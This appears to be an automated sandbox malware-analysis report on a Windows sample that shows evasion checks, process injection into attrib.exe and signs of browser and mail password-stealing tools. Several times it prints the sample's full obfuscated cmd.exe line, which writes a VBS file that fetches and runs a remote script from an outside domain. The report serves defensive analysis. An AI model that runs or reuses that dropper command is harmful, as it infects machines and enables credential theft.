                  Source: Binary string: c:\U\Release\s6i226.pdb source: ef2dsio342ai.exe, 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmp, ef2dsio342ai.exe, 0000000C.00000003.1877832158.0000000001F51000.00000004.00000020.00020000.00000000.sdmp, ef2dsio342ai.exe, 0000000C.00000003.1877743856.0000000001F84000.00000004.00000020.00020000.00000000.sdmp, ef2dsio342ai.exe, 0000000C.00000003.1877743856.0000000001FB5000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: C:\U3\GtYD2\Release\GtYD2.pdb source: dGuYmJNS1K.exe
                  Source: dGuYmJNS1K.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: dGuYmJNS1K.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: dGuYmJNS1K.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: dGuYmJNS1K.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: dGuYmJNS1K.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbs
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbsJump to behavior
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCode function: 0_2_00FEF0D4 push ecx; ret 0_2_00FEF0E7
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D60330 push edi; ret 12_2_00D60333
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D30E06 push ecx; ret 12_2_00D30E19
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D2DC00 push eax; iretd 12_2_00D2DC01
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10007566 push ecx; ret 12_2_10007579
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000ADE5 push ecx; ret 12_2_1000ADF8
                  Source: C:\Windows\SysWOW64\attrib.exeCode function: 13_2_0074549C push eax; iretd 13_2_007460ED
                  Source: C:\Windows\SysWOW64\attrib.exeCode function: 13_2_0041B174 push ecx; mov dword ptr [esp], eax13_2_0041B176
                  Source: C:\Windows\SysWOW64\attrib.exeCode function: 13_2_0041AE44 push ecx; mov dword ptr [esp], eax13_2_0041AE46
                  Source: C:\Windows\SysWOW64\attrib.exeCode function: 13_2_004CEE80 push ecx; mov dword ptr [esp], edx13_2_004CEE85
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D15D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00D15D78

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\bjk6l9.vbsJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\wql455oi0\lp1a3Jump to dropped file
                  Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\wql455oi0\lp1a3Jump to dropped file
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00DA25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_00DA25A0
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D2FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00D2FC8A
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\attrib.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\attrib.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\attrib.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\attrib.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\attrib.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\attrib.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\attrib.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\wql455oi0\ef2dsio342ai.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_12-112519
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\wql455oi0\ef2dsio342ai.exeAPI coverage: 4.7 %
                  Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_BIOS
                  Source: C:\wql455oi0\ef2dsio342ai.exeAPI call chain: ExitProcess graph end nodegraph_12-113645
                  Source: C:\wql455oi0\ef2dsio342ai.exeAPI call chain: ExitProcess graph end nodegraph_12-113261
                  Source: wscript.exe, 00000008.00000003.1738155988.0000000005FF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738724139.0000000005FF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738217818.0000000005FF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: https://m4gx.dns04.com/v/lp1382.dfhyhgfS
                  Source: attrib.exe, 0000000D.00000002.2911236455.00000000032AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D15D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00D15D78
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCode function: 0_2_00FE756C FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00FE756C
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D7E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_00D7E387
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D8A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00D8A0FA
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D8A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_00D8A488
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D865F1 FindFirstFileW,FindNextFileW,FindClose,12_2_00D865F1
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_00D872E9
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D87248 FindFirstFileW,FindClose,12_2_00D87248
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D7D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00D7D836
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D7DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00D7DB69
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D89F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00D89F9F
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10001B50 FindFirstFileW,_fseek,_malloc,_fseek,__fread_nolock,12_2_10001B50
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10001CB0 FindFirstFileW,std::ios_base::_Ios_base_dtor,_rand,Sleep,_rand,Sleep,std::ios_base::_Ios_base_dtor,_rand,Sleep,std::ios_base::_Ios_base_dtor,_rand,Sleep,12_2_10001CB0
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000DD08 __ioinit,FindFirstFileW,___lock_fhandle,FindFirstFileW,__lseek_nolock,12_2_1000DD08
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000DDF7 FindFirstFileW,FindFirstFileW,__get_osfhandle,FindFirstFileW,FindFirstFileW,SetFilePointer,GetLastError,__dosmaperr,12_2_1000DDF7
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10005E22 __getstream,@_EH4_CallFilterFunc@8,FindFirstFileW,__openfile,12_2_10005E22
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10015FFE __ioinit,GetLastError,__dosmaperr,__alloc_osfhnd,___createFile,FindFirstFileW,___createFile,GetLastError,__dosmaperr,GetFileType,GetLastError,__dosmaperr,CloseHandle,__set_osfhnd,__lseeki64_nolock,__read_nolock,__chsize_nolock,__lseeki64_nolock,__lseeki64_nolock,__lseeki64_nolock,__read_nolock,__lseeki64_nolock,__lseeki64_nolock,__lseeki64_nolock,CloseHandle,FindFirstFileW,___createFile,GetLastError,__dosmaperr,__free_osfhnd,__invoke_watson,12_2_10015FFE
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10006006 FindFirstFileW,FindFirstFileW,_memcpy_s,FindFirstFileW,__read_nolock,__filbuf,12_2_10006006
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100022B0 ef2dsio342,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindFirstFileW,12_2_100022B0
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000651B FindFirstFileW,FindFirstFileW,__write,__lseeki64,ReadFile,__write,__write,__write,12_2_1000651B
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10006874 FindFirstFileW,__lock_file,FindFirstFileW,__ftell_nolock,12_2_10006874
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100068DC FindFirstFileW,FindFirstFileW,__ftell_nolock,FindFirstFileW,__flush,FindFirstFileW,__write,12_2_100068DC
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000696B FindFirstFileW,__lock_file,FindFirstFileW,__fseek_nolock,12_2_1000696B
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10006A35 FindFirstFileW,__flush,__freebuf,__close,_free,12_2_10006A35
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10006AA1 FindFirstFileW,__lock_file,FindFirstFileW,__fclose_nolock,12_2_10006AA1
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000CB3C FindFirstFileW,__sopen_s,12_2_1000CB3C
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000557C FindFirstFileW,FindFirstFileNameW,__lock,FindNextChangeNotification,FindNextChangeNotification,EnterCriticalSection,12_2_1000557C
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100055BB FindFirstFileNameW,__lock,EnterCriticalSection,12_2_100055BB
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10013A05 FindFirstFileW,SetStdHandle,12_2_10013A05
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10005A07 FindFirstFileW,FindFirstFileW,12_2_10005A07
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10003A90 FindFirstFileW,_memmove,12_2_10003A90
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000BD1B __ioinit,FindFirstFileW,___lock_fhandle,FindFirstFileW,__lseeki64_nolock,12_2_1000BD1B
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000DDCE FindFirstFileW,__unlock_fhandle,12_2_1000DDCE
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000BDFA FindFirstFileW,__unlock_fhandle,12_2_1000BDFA
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000DE70 FindFirstFileW,12_2_1000DE70
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000BF8C __ioinit,FindFirstFileW,___lock_fhandle,FindFirstFileW,__write_nolock,12_2_1000BF8C
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000C052 FindFirstFileW,__unlock_fhandle,12_2_1000C052
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000C07B FindFirstFileW,FindFirstFileW,__ioinit,FindFirstFileW,GetStdHandle,__lseeki64_nolock,__isatty,GetConsoleMode,GetConsoleCP,WideCharToMultiByte,WriteFile,WriteFile,WriteFile,WriteFile,WideCharToMultiByte,WriteFile,GetLastError,WriteFile,GetLastError,__dosmaperr,12_2_1000C07B
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100068D4 FindFirstFileW,12_2_100068D4
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100088F0 FindFirstFileW,12_2_100088F0
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100069E2 FindFirstFileW,12_2_100069E2
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10006B10 FindFirstFileW,12_2_10006B10
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000CDC0 FindFirstFileW,12_2_1000CDC0
                  Source: C:\Windows\SysWOW64\attrib.exeCode function: 13_2_0040C5B8 FindFirstFileW,13_2_0040C5B8
                  Source: C:\Windows\SysWOW64\wscript.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D15D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00D15D78
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D35078 mov eax, dword ptr fs:[00000030h]12_2_00D35078
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCode function: 0_2_00FE1A8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FE1A8E
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100135E8 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,12_2_100135E8
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCode function: 0_2_00FE98ED GetProcessHeap,0_2_00FE98ED
                  Source: C:\Windows\SysWOW64\attrib.exeCode function: 13_2_004093C8 LdrInitializeThunk,13_2_004093C8
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D8F3FF BlockInput,12_2_00D8F3FF
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCode function: 0_2_00FE1C21 SetUnhandledExceptionFilter,0_2_00FE1C21
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCode function: 0_2_00FE1A8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FE1A8E
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCode function: 0_2_00FE5A5B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FE5A5B
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCode function: 0_2_00FE1602 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FE1602
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D429B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00D429B2
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D30BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00D30BCF
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D30D65 SetUnhandledExceptionFilter,12_2_00D30D65
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D30FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00D30FB1
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000E6D9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_1000E6D9

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\wql455oi0\ef2dsio342ai.exeMemory allocated: C:\Windows\SysWOW64\attrib.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeMemory written: C:\Windows\SysWOW64\attrib.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10001950 _rand,Sleep,CreateProcessA,_rand,Sleep,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,_rand,Sleep,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,12_2_10001950
                  Source: C:\wql455oi0\ef2dsio342ai.exeMemory written: C:\Windows\SysWOW64\attrib.exe base: 400000Jump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeMemory written: C:\Windows\SysWOW64\attrib.exe base: 401000Jump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeMemory written: C:\Windows\SysWOW64\attrib.exe base: 743000Jump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeMemory written: C:\Windows\SysWOW64\attrib.exe base: 746000Jump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeMemory written: C:\Windows\SysWOW64\attrib.exe base: 765000Jump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeMemory written: C:\Windows\SysWOW64\attrib.exe base: 76B000Jump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeMemory written: C:\Windows\SysWOW64\attrib.exe base: 770000Jump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeMemory written: C:\Windows\SysWOW64\attrib.exe base: 771000Jump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeMemory written: C:\Windows\SysWOW64\attrib.exe base: 772000Jump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeMemory written: C:\Windows\SysWOW64\attrib.exe base: 773000Jump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeMemory written: C:\Windows\SysWOW64\attrib.exe base: 7B9000Jump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeMemory written: C:\Windows\SysWOW64\attrib.exe base: 2EEA008Jump to behavior
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":geto^">%public%\bjk6l9.vbs&echo|set /p=^"bject("scr"+r54+"pt"+k4js7+"ht"+"tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %public%\bjk6l9.vbs
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":geto^">%public%\bjk6l9.vbs&echo|set /p=^"bject("scr"+r54+"pt"+k4js7+"ht"+"tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %public%\bjk6l9.vbsJump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D7BB02 SendInput,keybd_event,12_2_00D7BB02
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbsJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="sq048=".":r54="i":y8628="g":k4js7=":":GetO" 1>C:\Users\Public\bjk6l9.vbs"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")" 1>>C:\Users\Public\bjk6l9.vbs"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c start C:\Users\Public\bjk6l9.vbsJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\bjk6l9.vbs" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\wql455oi0\ef2dsio342ai.exe "C:\wql455oi0\ef2dsio342ai.exe" ef2dsio342Jump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeProcess created: C:\Windows\SysWOW64\attrib.exe c:/windows/SysWOW64/attrib.exeJump to behavior
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D71A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00D71A91
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D13312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00D13312
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D7EBE5 mouse_event,12_2_00D7EBE5
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D71EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_00D71EF3
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D713F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_00D713F2
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmp, lp1a3.8.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: ef2dsio342ai.exeBinary or memory string: Shell_TrayWnd
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shell_traywndU
                  Source: attrib.exeBinary or memory string: SHELL_TRAYWND
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SHELL_TRAYWNDU
                  Source: attrib.exeBinary or memory string: shell_traywnd
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: EnumSystemLocalesEx,12_2_10011683
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: GetLocaleInfoEx,12_2_10011699
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,12_2_100143E3
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\wql455oi0\ef2dsio342m1.zip VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\wql455oi0\ef2dsio342m1.zip VolumeInformationJump to behavior
